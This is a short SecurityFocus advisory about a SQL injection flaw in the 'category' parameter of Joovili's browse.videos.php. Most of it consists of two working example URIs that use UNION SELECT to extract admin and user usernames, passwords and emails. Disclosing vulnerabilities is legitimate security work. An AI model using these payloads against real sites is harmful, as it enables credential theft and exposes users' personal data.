Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Joovili 'category' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*
http://www.example.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*







 

Privacy Statement
Copyright 2008, SecurityFocus